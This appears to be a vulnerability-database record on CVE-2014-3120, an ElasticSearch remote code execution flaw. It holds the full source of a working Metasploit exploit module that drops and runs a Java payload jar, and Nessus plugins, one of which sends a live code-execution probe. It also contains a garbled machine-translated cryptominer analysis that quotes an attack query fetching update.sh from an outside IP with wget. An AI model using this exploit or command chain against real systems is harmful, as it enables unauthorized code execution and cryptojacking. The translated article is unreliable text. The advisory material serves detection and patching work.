Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in ElasticSearch,\r\n exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the\r\n REST API, which requires no authentication or authorization, where the search\r\n function allows dynamic scripts execution, and can be used for remote attackers\r\n to execute arbitrary Java code. This module has been tested successfully on\r\n ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'Alex Brasetvik', # Vulnerability discovery\r\n 'Bouke van der Bijl', # Vulnerability discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-3120'],\r\n ['OSVDB', '106949'],\r\n ['EDB', '33370'],\r\n ['URL', 'http://bouk.co/blog/elasticsearch-rce/'],\r\n ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'ElasticSearch 1.1.1 / Automatic', { } ]\r\n ],\r\n 'DisclosureDate' => 'Dec 09 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9200),\r\n OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', \"/\"]),\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only for *nix environments)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n result = Exploit::CheckCode::Safe\r\n\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n result\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to execute arbitrary Java..\")\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Java has not been executed, aborting...\")\r\n end\r\n\r\n print_status(\"#{peer} - Asking remote OS...\")\r\n res = execute(java_os)\r\n result = parse_result(res)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"#{peer} - Could not get remote OS...\")\r\n else\r\n print_good(\"#{peer} - OS #{result} found\")\r\n end\r\n\r\n jar_file = \"\"\r\n if result =~ /win/i\r\n print_status(\"#{peer} - Asking TEMP path\")\r\n res = execute(java_tmp_dir)\r\n result = parse_result(res)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"#{peer} - Could not get TEMP path...\")\r\n else\r\n print_good(\"#{peer} - TEMP path found on #{result}\")\r\n end\r\n jar_file = \"#{result}#{rand_text_alpha(3 + rand(4))}.jar\"\r\n else\r\n jar_file = File.join(datastore['WritableDir'], \"#{rand_text_alpha(3 + rand(4))}.jar\")\r\n end\r\n\r\n register_file_for_cleanup(jar_file)\r\n execute(java_payload(jar_file))\r\n end\r\n\r\n def vulnerable?\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n java = java_sum([addend_one, addend_two])\r\n res = execute(java)\r\n result = parse_result(res)\r\n\r\n if result.nil?\r\n return false\r\n else\r\n result.to_i == sum\r\n end\r\n end\r\n\r\n def parse_result(res)\r\n unless res && res.code == 200 && res.body\r\n return nil\r\n end\r\n\r\n begin\r\n json = JSON.parse(res.body.to_s)\r\n rescue JSON::ParserError\r\n return nil\r\n end\r\n\r\n begin\r\n result = json['hits']['hits'][0]['fields']['msf_result'][0]\r\n rescue\r\n return nil\r\n end\r\n\r\n result\r\n end\r\n\r\n def java_sum(summands)\r\n source = <<-EOF\r\n#{summands.join(\" + \")}\r\n EOF\r\n\r\n source\r\n end\r\n\r\n def to_java_byte_array(str)\r\n buff = \"byte[] buf = new byte[#{str.length}];\\n\"\r\n i = 0\r\n str.unpack('C*').each do |c|\r\n buff << \"buf[#{i}] = #{c};\\n\"\r\n i = i + 1\r\n end\r\n\r\n buff\r\n end\r\n\r\n def java_os\r\n \"System.getProperty(\\\"os.name\\\")\"\r\n end\r\n\r\n def java_tmp_dir\r\n \"System.getProperty(\\\"java.io.tmpdir\\\");\"\r\n end\r\n\r\n\r\n def java_payload(file_name)\r\n source = <<-EOF\r\nimport java.io.*;\r\nimport java.lang.*;\r\nimport java.net.*;\r\n\r\n#{to_java_byte_array(payload.encoded_jar.pack)}\r\nFile f = new File('#{file_name.gsub(/\\\\/, \"/\")}');\r\nFileOutputStream fs = new FileOutputStream(f);\r\nbs = new BufferedOutputStream(fs);\r\nbs.write(buf);\r\nbs.close();\r\nbs = null;\r\nURL u = f.toURI().toURL();\r\nURLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});\r\nClass c = cl.loadClass('metasploit.Payload');\r\nc.main(null);\r\n EOF\r\n\r\n source\r\n end\r\n\r\n def execute(java)\r\n payload = {\r\n \"size\" => 1,\r\n \"query\" => {\r\n \"filtered\" => {\r\n \"query\" => {\r\n \"match_all\" => {}\r\n }\r\n }\r\n },\r\n \"script_fields\" => {\r\n \"msf_result\" => {\r\n \"script\" => java\r\n }\r\n }\r\n }\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s, \"_search\"),\r\n 'method' => 'POST',\r\n 'data' => JSON.generate(payload)\r\n })\r\n\r\n return res\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33588/"}], "nessus": [{"lastseen": "2020-02-01T07:06:16", "bulletinFamily": "scanner", "description": "The Elasticsearch application hosted on the remote web server is\naffected by a remote code execution vulnerability due to a failure to\nproperly sanitize user-supplied input to the ", "modified": "2020-02-02T00:00:00", "id": "ELASTICSEARCH_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/76572", "published": "2014-07-17T00:00:00", "title": "Elasticsearch 'source' Parameter RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76572);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-3120\");\n script_bugtraq_id(67731);\n script_xref(name:\"EDB-ID\", value:\"33370\");\n script_xref(name:\"EDB-ID\", value:\"33588\");\n\n script_name(english:\"Elasticsearch 'source' Parameter RCE\");\n script_summary(english:\"Attempts to execute arbitrary Java code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a Java application that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Elasticsearch application hosted on the remote web server is\naffected by a remote code execution vulnerability due to a failure to\nproperly sanitize user-supplied input to the 'source' parameter of the\n'/_search' page. A remote, unauthenticated attacker can exploit this\nflaw to execute arbitrary Java code or manipulate files on the remote\nhost.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bouk.co/blog/elasticsearch-rce/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.elastic.co/blog/found-elasticsearch-security\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.2.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-3120\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ElasticSearch Dynamic Script Arbitrary Java Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:elasticsearch:elasticsearch\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"elasticsearch_detect.nbin\");\n script_require_keys(\"installed_sw/Elasticsearch\");\n script_require_ports(\"Services/www\", 9200);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\napp = \"Elasticsearch\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:9200);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\nurl = build_url(qs:dir, port:port);\nvuln = FALSE;\n\nj_int = rand();\nj_int2 = rand();\nj_int3 = rand();\n\nattack = '{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"' +\n 'script_fields\":{\"Java Properties\":{\"script\":\"import java.lang.*;\\\\n' +\n 'System.getProperties();\"}}}&callback=jQuery' + j_int + '_' + j_int2 +\n '&_=' + j_int3;\n\nattack = urlencode(\n str : attack,\n unreserved : 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.&=_*()',\n case_type : HEX_UPPERCASE\n);\nattack = dir+\"_search?source=\"+attack;\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : attack,\n exit_on_fail : TRUE\n);\n\nvuln = (\n (\"jQuery\" + j_int + \"_\" + j_int2) >< res[2] &&\n \"java.specification.version\" >< res[2] &&\n \"java.version\" >< res[2] &&\n '\"successful\":' >< res[2]\n);\n\nif (!vuln) \n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n\nattack = build_url(qs:attack, port:port);\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n cmd : \"System.getProperties()\",\n output : res[2],\n request : make_list(attack),\n line_limit : 25\n);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-01T01:43:12", "bulletinFamily": "scanner", "description": "An updated katello-configure package that fixes one security issue is\nnow available for Red Hat Subscription Asset Manager.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe katello-configure package provides the katello-configure script,\nwhich configures the Katello installation, and the katello-upgrade\nscript, which handles upgrades between versions.\n\nIt was discovered that the default configuration of Elasticsearch\nenabled dynamic scripting, allowing a remote attacker to execute\narbitrary MVEL expressions and Java code via the source parameter\npassed to _search. (CVE-2014-3120)\n\nAll Subscription Asset Manager users are advised to upgrade to this\nupdated package. The update provides a script that modifies the\nelasticsearch.yml configuration file to disable dynamic scripting.\nAfter updating, run the ", "modified": "2020-02-02T00:00:00", "id": "REDHAT-RHSA-2014-1186.NASL", "href": "https://www.tenable.com/plugins/nessus/77661", "published": "2014-09-12T00:00:00", "title": "RHEL 6 : katello-configure (RHSA-2014:1186)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1186. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77661);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:38\");\n\n script_cve_id(\"CVE-2014-3120\");\n script_bugtraq_id(67731);\n script_xref(name:\"RHSA\", value:\"2014:1186\");\n\n script_name(english:\"RHEL 6 : katello-configure (RHSA-2014:1186)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated katello-configure package that fixes one security issue is\nnow available for Red Hat Subscription Asset Manager.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe katello-configure package provides the katello-configure script,\nwhich configures the Katello installation, and the katello-upgrade\nscript, which handles upgrades between versions.\n\nIt was discovered that the default configuration of Elasticsearch\nenabled dynamic scripting, allowing a remote attacker to execute\narbitrary MVEL expressions and Java code via the source parameter\npassed to _search. (CVE-2014-3120)\n\nAll Subscription Asset Manager users are advised to upgrade to this\nupdated package. The update provides a script that modifies the\nelasticsearch.yml configuration file to disable dynamic scripting.\nAfter updating, run the 'katello-configure' command. This will update\nthe elasticsearch.yml configuration file and restart the elasticsearch\nservice.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3120\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected katello-configure package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ElasticSearch Dynamic Script Arbitrary Java Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:katello-configure\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1186\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"katello-configure-1.4.5.1-3.el6sam\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"katello-configure\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-01T07:47:37", "bulletinFamily": "scanner", "description": "Elastic reports :\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\ndynamic scripting is enabled by default. This could allow an attacker\nto execute OS commands.\n\nRemediation Summary: Disable dynamic scripting.\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\nvulnerable to CVE-2014-3120. These binaries are used in Elasticsearch\noutput specifically when using the node protocol. Since a node client\njoins the Elasticsearch cluster, the attackers could use scripts to\nexecute commands on the host OS using the node client", "modified": "2020-02-02T00:00:00", "id": "FREEBSD_PKG_43AC9D421B9A11E5B43D002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/84411", "published": "2015-06-26T00:00:00", "title": "FreeBSD : elasticsearch and logstash -- remote OS command execution via dynamic scripting (43ac9d42-1b9a-11e5-b43d-002590263bf5)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84411);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/07/10 16:04:13\");\n\n script_cve_id(\"CVE-2014-3120\");\n script_bugtraq_id(67731);\n script_xref(name:\"EDB-ID\", value:\"33370\");\n\n script_name(english:\"FreeBSD : elasticsearch and logstash -- remote OS command execution via dynamic scripting (43ac9d42-1b9a-11e5-b43d-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Elastic reports :\n\nVulnerability Summary: In Elasticsearch versions 1.1.x and prior,\ndynamic scripting is enabled by default. This could allow an attacker\nto execute OS commands.\n\nRemediation Summary: Disable dynamic scripting.\n\nLogstash 1.4.2 was bundled with Elasticsearch 1.1.1, which is\nvulnerable to CVE-2014-3120. These binaries are used in Elasticsearch\noutput specifically when using the node protocol. Since a node client\njoins the Elasticsearch cluster, the attackers could use scripts to\nexecute commands on the host OS using the node client's URL endpoint.\nWith 1.4.3 release, we are packaging Logstash with Elasticsearch 1.5.2\nbinaries which by default disables the ability to run scripts. This\nalso affects users who are using the configuration option\nembedded=>true in the Elasticsearch output which starts a local\nembedded Elasticsearch cluster. This is typically used in development\nenvironment and proof of concept deployments. Regardless of this\nvulnerability, we strongly recommend not using embedded in production.\n\nNote that users of transport and http protocol are not vulnerable to\nthis attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/community/security\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/blog/elasticsearch-1-2-0-released\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/blog/logstash-1-4-3-released\"\n );\n # http://bouk.co/blog/elasticsearch-rce/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bouk.co/blog/elasticsearch-rce/\"\n );\n # http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27fc4ce3\"\n );\n # https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6702767b\"\n );\n # https://vuxml.freebsd.org/freebsd/43ac9d42-1b9a-11e5-b43d-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8f9d692\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ElasticSearch Dynamic Script Arbitrary Java Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:elasticsearch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:logstash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"elasticsearch<1.2.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"logstash<1.4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2018-12-14T13:11:06", "bulletinFamily": "info", "description": "ElasticSearch is based on Lucene search server. It provides a distributed multi-user capability of the full-text search engine, based on the RESTful web interface. Elasticsearch is developed in Java, and as the Apache license under the terms of the open source release, is the current popular enterprise search engine. To be able to achieve real-time search, stable, reliable, fast to install and easy to use. \nResearchers at containing the Elasticsearch search engine honeypot system detected the mining activities. Mining attacks exploit the known CVE-2015-1427 and CVE-2014-3120 vulnerability. CVE-2015-1427 is the Groovy script engine vulnerability, allowing a remote attacker by constructing a script to remotely execute arbitrary shell commands. CVE-2014-3120 is Elasticsearch's default configuration vulnerability. Currently Elasticsearch no longer support a vulnerable version. \nThe researchers in the running Elasticsearch server running on the following query command: \n\u201c{\u201clupin\u201d:{\u201cscript\u201d: \u201cjava. lang. Math. class. forName(\u201djava. lang. Runtime\u201d). getRuntime(). exec(\u201dwget hxxp://69[.] 30[.] 203[.] 170/gLmwDU86r9pM3rXf/update.sh -P \n/tmp/sssooo\u201d). getText()\u201d}}}\u201d \nThe same to attack the system and attack the host also utilizes the same command, the command can also save the payload in. The IP is resolved to the corresponding domain name for matrixhazel[.] com, up to now, the IP has been unable to access. \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/greynoise-fig1.png) \nFigure 1. GreyNoise the host is marked as a known scanner \n\u6316\u77ff\u673a\u9996\u5148\u8c03\u7528shell\u548c\u8fd0\u884c\u4e0b\u8f7d\u7684\u547d\u4ee4\u4f20\u64adbash\u811a\u672cupdate.sh that the output of the command is set to/tmp/sssooo file. Use the/tmp file is because in most systems the default limit is relatively small. \nThe attack is very simple, the victim will bring a significant impact. Once the attacker gets to run any command ability, you can attempt to privilege elevation, even turning to other systems to invasion of the entire network. \nAlthough the method of attack is about the same, but the payload may be different. For example, the researchers analyze the samples, payload\u5c31\u662fupdate.sh the. After running the update. sh script will download two files: devtools and config. json. The script will then apply the crypto-currency mining machine. \nMining machine ELF64 binaries is actually the devtools, to help better disguise the mining machine, because devtools is on GitHub common of a tool. Mining machine using the configuration in the config. the json file. \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/config-json-fig2.jpg) \nFigure 2. config. the json configuration file \nThis program before can also be malicious software is widely used, but the package script has many other interesting functions. Code style and the hack tool is very similar to that part of the code also appears in the Xbash associated malware. \n\nCrypto currency mining machine application \nMining machine containing three files, you can bash the wget, curl or url command download: \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/wget-curl-url-fig3.png) \nFigure 3. wget, curl, the url command \nMining machine can be downloaded the following: \nDevtools \u2013 real mining machine \nUpdate.sh \u2013 used to download other portion of the bash script \nConfig. json \u2013 mining machine configuration file \nFirst, the malicious software will try to save these files in/etc/, and if that fails, then it tries to save in/tmp directory. The researchers found in the analysis of samples stored in/tmp to be successful. After, check the machine whether there are other mining activities. It is assumed that the device has been attacked, and attempts from an attacker to hijack the machine. This process may be used to update the mining machine to the updated version. \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/other-miners-fig4.jpg) \nFigure 4. The sample allows the mining machine to clear the other has a mining machine of the command \nIf detected in the system, other mining machines, running the mining machine associated with other processes will be killed. Will also reset the crontab, so that cron will not open other mining machine. \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/processes-other-miners-fig5.png) \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/processes-other-miners-fig5-1.png) \nFigure 5. System, the other is to kill the mining machine process \nAnd then mining the opportunity to put their own added to the crontab, and every 10 minutes run time. Each run will use chattr-i the first to unlock themselves, and update their file, and finally use chattr +i to protect the file to prevent the file from being a low-Rights user to modify or delete. Mining machine will also clear the history to prevent being tracked, such as shown in Figure 8. Among the interesting point is that when the script is in the root directory of the runtime, the script will try to move their SSH key added to authorized_keys, so that you can no password to login. But the command sequence there are problems, leading to the key just added to the authorized_keys will be removed. \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/miner-protection-persistence-encryption-fig6.png) \nFigure 6. Mining machine, other function: components protection, crontab completed reside, network traffic encryption \n! [](https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/12/miner-iptables-fig7.png) \nFigure 7. Mining machine modify your system's iptables/firewall \n\n\n**[1] [[2]](<92387_2.htm>) [next](<92387_2.htm>)**\n", "modified": "2018-12-14T00:00:00", "published": "2018-12-14T00:00:00", "id": 